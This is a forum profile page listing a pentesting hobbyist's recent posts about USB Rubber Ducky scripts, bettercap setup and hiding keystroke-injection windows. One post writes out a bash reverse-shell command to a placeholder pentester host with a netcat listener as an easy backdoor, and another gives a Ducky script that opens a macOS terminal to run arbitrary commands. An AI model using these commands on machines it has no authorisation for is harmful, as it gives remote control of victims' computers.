Jump to content

sub0

Active Members
  • Posts

    8
  • Joined

  • Last visited

Profile Information

  • Gender
    Not Telling

Recent Profile Visitors

583 profile views

sub0's Achievements

Newbie

Newbie (1/14)

  1. Use this to add to your path: echo "export PATH=$PATH:/your/golang/path" >> ~/.bashrc But it seems that something isn't installed for the root user in raspbian. Try installing bettercap as root.
  2. Can you elaborate? Do you need help making an OSX backdoor script or making it deploy via the duck?
  3. I'm not sure if I understand the question. There are ways to make the ducky harder to recognize, like making the window hidden or very small, but I don't think there is any way to make nothing pop up at all.
  4. Interesting. I'm having a very similar problem. What OS and what utility are you using to flash?
  5. No, that command is for UNIX platforms. If you are targeting Windows, you could use Metasploit.
  6. I use this script to open spotlight and enter a terminal. DELAY 1500 GUI SPACE DELAY 100 STRING terminal DELAY 50 ENTER DELAY 1000 STRING # Whatever command you want to execute DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER DELAY 20 GUI q
  7. If you really want to use Python, have the Ducky grab the script from a server (Or hastebin). However, there are much easier ways to accomplish a backdoor. You can just execute this command: `bash -i >& /dev/tcp/pentesterIPaddr/5000 0>&1` on UNIX systems and catch the shell with Netcat. (nc -l -p 5000)
×
×
  • Create New...